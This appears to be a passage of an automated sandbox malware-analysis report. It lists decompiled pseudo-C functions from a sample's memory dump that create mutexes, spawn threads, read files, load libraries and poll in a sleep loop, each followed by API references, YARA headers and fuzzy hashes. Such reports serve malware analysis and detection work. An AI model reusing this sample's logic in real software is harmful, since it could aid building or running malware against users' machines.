									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0xde770; // 0x2631ee8
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E000CA471(0, 1);
									_t82 =  *0xde770; // 0x2631ee8
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0xde770; // 0x2631ee8
									_t30 = _t83 + _t113 + 4; // 0x2631eec
									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0xde770; // 0x2631ee8
									 *(_t113 + _t53) = _t52;
									_t54 =  *0xde770; // 0x2631ee8
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0xde770; // 0x2631ee8
										 *0xde774 =  *0xde774 + 1;
										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0xde770; // 0x2631ee8
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0xde684; // 0x27bf8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0xde770; // 0x2631ee8
										_t37 = _t61 + 0xc; // 0x2631ef4
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0xde770; // 0x2631ee8
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0xde76c; // 0x1cc
									E000CA4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E000C8604(_t110);
								_t97 =  *0xde770; // 0x2631ee8
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0xde770; // 0x2631ee8
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0xde770; // 0x2631ee8
								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0xde684; // 0x27bf8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0xde770; // 0x2631ee8
							goto L7;
						}
						_t98 =  *0xde770; // 0x2631ee8
						E000C984A(_t106 + _t98, 0);
						_t45 =  *0xde770; // 0x2631ee8
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000c98f1
0x000c98f2
0x000c98f3
0x000c98fb
0x000c98fe
0x000c9905
0x000c990e
0x000c9917
0x000c991e
0x000c9920
0x000c9922
0x000c9922
0x000c9927
0x000c994f
0x000c9952
0x000c996c
0x000c9972
0x000c99b2
0x000c99b6
0x000c99bb
0x000c99bf
0x000c99bf
0x000c99cb
0x000c99cf
0x000c99d7
0x000c99dd
0x000c99e2
0x000c99e8
0x000c99ec
0x000c99f4
0x000c9a06
0x000c9a0b
0x000c9a10
0x000c9a13
0x000c9a18
0x000c9a1d
0x000c9a59
0x000c9a5f
0x000c9a65
0x000c9a6f
0x000c9a74
0x000c9a7a
0x000c9a1f
0x000c9a23
0x000c9a28
0x000c9a2b
0x000c9a30
0x000c9a33
0x000c9a37
0x000c9a3e
0x000c9a43
0x000c9a49
0x000c9a51
0x000c9a52
0x000c9a52
0x000c9a7c
0x000c9a7c
0x000c9a82
0x000c9a88
0x000c9a8b
0x000c9a8d
0x000c9a8d
0x000c9974
0x000c9978
0x000c997e
0x000c9984
0x000c9988
0x000c9991
0x00000000
0x00000000
0x000c9997
0x000c999b
0x000c99a8
0x000c99ad
0x00000000
0x000c99ad
0x00000000
0x000c9952
0x000c9929
0x000c992e
0x000c992f
0x000c9938
0x000c9965
0x00000000
0x000c9965
0x000c993a
0x000c9945
0x000c994a
0x00000000
0x000c9954
0x000c9954
0x000c9957
0x000c9958
0x00000000
0x000c9960
0x000c9910
0x00000000

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
Opcode Fuzzy Hash: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C5631, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E000C5631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E000C9E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E000C980C(0xde6c8);
					_t39 = 0x37; // executed
					E000C9F06(_t39);
					_t11 =  *0xde688; // 0xf0000
					_t40 = 0x3a; // executed
					E000C9F06(_t40); // executed
					E000CE4C1(_t63);
					_t14 =  *0xde688; // 0xf0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0xde684; // 0x27bf8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
					 *0xde74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0xde76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E000C8604(0x1000); // executed
							_t52 = 0;
							 *0xde770 = _t34;
							_t49 =  *0xde774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0xde774 =  !=  ? 0 : _t49; // executed
						}
						E000C153B(_t41, _t52); // executed
						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
						E000C3017(); // executed
						E000C31C2(0, __eflags); // executed
						E000C29B1(); // executed
						E000C3BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0xde758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E000C980C(0xde750);
							_push(0xde750);
							_push(0xde750); // executed
							E000C279B();
							Sleep(0xfa0);
						}
						E000C3D34();
						E000C9A8E();
						E000C34CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E000C2DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x000c5631
0x000c563d
0x000c5646
0x000c5651
0x000c5656
0x000c5669
0x000c566a
0x000c566f
0x000c567f
0x000c5680
0x000c5688
0x000c568d
0x000c5692
0x000c569c
0x000c569f
0x000c56a9
0x000c56b1
0x000c56b7
0x000c56be
0x000c56d0
0x000c56d6
0x000c56db
0x000c56dd
0x000c56e4
0x000c56e9
0x000c56eb
0x000c56f1
0x000c56f7
0x000c56f9
0x000c56fc
0x000c56fc
0x000c5702
0x000c5710
0x000c5717
0x000c571c
0x000c5721
0x000c5726
0x000c5750
0x000c5750
0x000c5756
0x00000000
0x00000000
0x000c5732
0x000c5737
0x000c5738
0x000c5739
0x000c574a
0x000c574a
0x000c5758
0x000c575d
0x000c5762
0x000c5767
0x000c5767
0x00000000
0x00000000
0x00000000
0x000c5648
0x000c5648
0x000c564d
0x000c564f
0x000c56c0
0x000c56c2
0x00000000
0x00000000
0x00000000
0x000c564f
0x000c576d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0

Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819

Sleep.KERNELBASE(00000FA0), ref: 000C574A

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystem
String ID:
API String ID: 1795067453-0
Opcode ID: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
Opcode Fuzzy Hash: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672

Uniqueness

Uniqueness Score: -1.00%

Function 000CA6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E000CA63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xde684; // 0x27bf8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xde684; // 0x27bf8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000C861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E000C8604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x000ca6ac
0x000ca6ad
0x000ca6ae
0x000ca6b2
0x000ca6b4
0x000ca6b9
0x000ca6c9
0x000ca6cd
0x000ca757
0x000ca757
0x000ca759
0x000ca75b
0x000ca75d
0x000ca75d
0x000ca6d3
0x000ca6e1
0x000ca6e5
0x000ca73d
0x000ca73d
0x000ca743
0x000ca748
0x000ca750
0x000ca756
0x00000000
0x000ca748
0x000ca6e7
0x000ca6eb
0x000ca6f0
0x000ca6f2
0x000ca6f8
0x00000000
0x00000000
0x000ca6fc
0x000ca6ff
0x000ca700
0x000ca706
0x000ca707
0x000ca708
0x000ca72d
0x000ca70f
0x000ca761
0x00000000
0x00000000
0x000ca763
0x000ca766
0x000ca76c
0x000ca76e
0x000ca76e
0x000ca776
0x000ca779
0x00000000
0x000ca779
0x000ca717
0x000ca71a
0x000ca71e
0x000ca720
0x000ca723
0x000ca728
0x000ca72c
0x000ca72c
0x00000000
0x000ca72d
0x000ca6bb
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,027BFD30,00000400), ref: 000CA776

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
Opcode Fuzzy Hash: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 000C153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E000C153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0xde6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xde6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E000C1080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0xde6e8 = E000C91A6(_t3, 0);
							E000C85C2( &_v8);
							_t7 = E000C8604(0x100);
							 *0xde6f0 = _t7;
							if(_t7 != 0) {
								 *0xde6fc = 0;
								_t9 = E000C8604(0x401);
								 *0xde6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xde6c0; // 0x0
									if(__eflags == 0) {
										E000D15B6(E000C8202, 0xc820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E000CE1BC(0xdbd28, _t24); // executed
									 *0xde6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x000c153e
0x000c1545
0x000c154b
0x000c1552
0x000c1607
0x000c1607
0x000c1607
0x000c1558
0x000c155b
0x000c1561
0x000c1568
0x00000000
0x000c156e
0x000c1573
0x000c1578
0x000c157d
0x00000000
0x000c1583
0x000c158f
0x000c1594
0x000c159e
0x000c15a3
0x000c15ab
0x000c15b9
0x000c15bf
0x000c15c4
0x000c15ca
0x000c15cc
0x000c15d2
0x000c15d8
0x000c15e4
0x000c15ea
0x000c15eb
0x000c15f2
0x000c15f8
0x000c15fd
0x000c1602
0x000c15ce
0x000c15ce
0x00000000
0x000c15ce
0x000c15ad
0x000c15ad
0x000c15af
0x000c15af
0x000c15af
0x000c15ab
0x000c157d
0x000c1568
0x000c160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
Opcode Fuzzy Hash: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738

Uniqueness

Uniqueness Score: -1.00%

Function 000C5974, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E000C5974(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E000CA86D( &_v52, __ecx, __eflags);
				_t16 =  *0xde688; // 0xf0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0xde684; // 0x27bf8f0
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E000C9292("Global");
				_t19 = E000C590C(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					CloseHandle(_v8);
					_v8 = 0;
					E000C590C( &_v52, _t42,  &_v8); // executed
				}
				E000C861A( &_v12, 0xffffffff);
				return _v8;
			}

0x000c597c
0x000c5982
0x000c5988
0x000c598d
0x000c5998
0x000c599a
0x000c599a
0x000c59a1
0x00000000
0x000c59a1
0x000c59a9
0x000c59ad
0x000c59ae
0x000c59c0
0x000c59c8
0x000c59d0
0x000c59d3
0x000c59dd
0x000c59e3
0x000c59ec
0x000c59f1
0x000c59f8
0x000c5a05

APIs

CloseHandle.KERNELBASE(000C5DD4,?,?,?,?,00000002), ref: 000C59DD

Strings

Global, xrefs: 000C59B3

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID: Global
API String ID: 2962429428-4020866741
Opcode ID: 3e7d5dd301a71e63a3836bfe50b69a12b6a9b87e59ec28fc4f01eec1221f2752
Instruction ID: 4ba206982d4dc08780ad7651fb4155ee72ffab201f78b51dab85fb8038c37bd4
Opcode Fuzzy Hash: 3e7d5dd301a71e63a3836bfe50b69a12b6a9b87e59ec28fc4f01eec1221f2752
Instruction Fuzzy Hash: 0011A576E00218EBDB00EB98DD45DDDB7F8EB94311F2101AAF405E7292DA30AE40C761

Uniqueness

Uniqueness Score: -1.00%

Function 000CE1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000C95C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E000CE171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000C85C2( &_v8);
				return _t25;
			}

0x000ce1bf
0x000ce1c2
0x000ce1c8
0x000ce1ca
0x000ce1cf
0x000ce1d1
0x000ce1db
0x000ce1dc
0x000ce1eb
0x000ce1de
0x000ce1de
0x000ce1de
0x000ce1ef
0x000ce1f6
0x000ce1fc
0x000ce1fc
0x000ce201
0x000ce20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 000C2C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E000CB700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E000CBB8D(_t70) == 0) {
					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E000C2C64( &_v1084, __eflags);
					} else {
						E000CB012(_t54,  &_v564); // executed
						_t32 = E000C109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000C92E5( &_v1084);
						E000C85D5( &_v12);
					}
				} else {
					_t38 = E000C109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0xde684; // 0x27bf8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E000C109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000C92E5( &_v564);
						E000C85D5( &_v8);
					} else {
						_t71 = E000C2C64( &_v44, _t78);
					}
					E000C85D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E000CB269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E000CB269(_t71) == 0) {
						E000C861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x000c2c9e
0x000c2ca0
0x000c2ca3
0x000c2ca9
0x000c2cb2
0x000c2d36
0x000c2d3b
0x000c2d3c
0x000c2d3e
0x000c2d8f
0x000c2d40
0x000c2d46
0x000c2d50
0x000c2d55
0x000c2d5a
0x000c2d5d
0x000c2d5e
0x000c2d63
0x000c2d64
0x000c2d65
0x000c2d6c
0x000c2d6d
0x000c2d7a
0x000c2d80
0x000c2d85
0x000c2cb4
0x000c2cb9
0x000c2cbe
0x000c2ccc
0x000c2cd0
0x000c2cd5
0x000c2cdb
0x000c2cdd
0x000c2ced
0x000c2cf2
0x000c2cf7
0x000c2cfa
0x000c2cfb
0x000c2d00
0x000c2d01
0x000c2d02
0x000c2d0f
0x000c2d15
0x000c2cdf
0x000c2ce4
0x000c2ce4
0x000c2d21
0x000c2d26
0x000c2d93
0x000c2d96
0x000c2d9d
0x000c2da1
0x000c2da9
0x000c2dbc
0x000c2dc1
0x000c2dc5
0x000c2da9
0x000c2dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
Opcode Fuzzy Hash: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4

Uniqueness

Uniqueness Score: -1.00%

Function 000C5AFF, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E000C8604(0x14);
				_t38 =  *0xde688; // 0xf0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E000C2DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E000C4D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E000CA39E();
				E000CA39E();
				return _t47;
			}

0x000c5aff
0x000c5aff
0x000c5b0a
0x000c5b0c
0x000c5b12
0x000c5b18
0x000c5b22
0x000c5b2b
0x000c5b36
0x000c5b41
0x000c5b47
0x000c5b4f
0x000c5b4f
0x000c5b55
0x000c5b5b
0x000c5b5e
0x000c5b69
0x000c5b71
0x000c5b73
0x000c5b78
0x000c5b98
0x000c5b9f
0x00000000
0x000c5ba1
0x000c5ba1
0x000c5ba1
0x000c5b7a
0x000c5b7a
0x000c5b7c
0x000c5b80
0x00000000
0x000c5b82
0x000c5b82
0x000c5b85
0x000c5b8b
0x000c5b8e
0x00000000
0x000c5b90
0x00000000
0x000c5b90
0x00000000
0x000c5b8e
0x000c5b96
0x000c5ba6
0x000c5ba8
0x00000000
0x00000000
0x00000000
0x000c5b96
0x000c5b80
0x000c5bad
0x000c5bb0
0x000c5bb8
0x000c5bc3

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F

Memory Dump Source

Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
Opcode Fuzzy Hash: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95

Uniqueness

Uniqueness Score: -1.00%

Function 000CBC7A, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E000CBC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0xde674; // 0x1e0
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000C95E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0xde68c; // 0x27bfab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0xde68c; // 0x27bfab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0xde68c; // 0x27bfab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0xde68c; // 0x27bfab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000C85D5( &_v24);
				return _t39;
			}

0x000cbc81
0x000cbc84
0x000cbc8f
0x000cbc92
0x000cbc95
0x000cbc98
0x000cbc9b
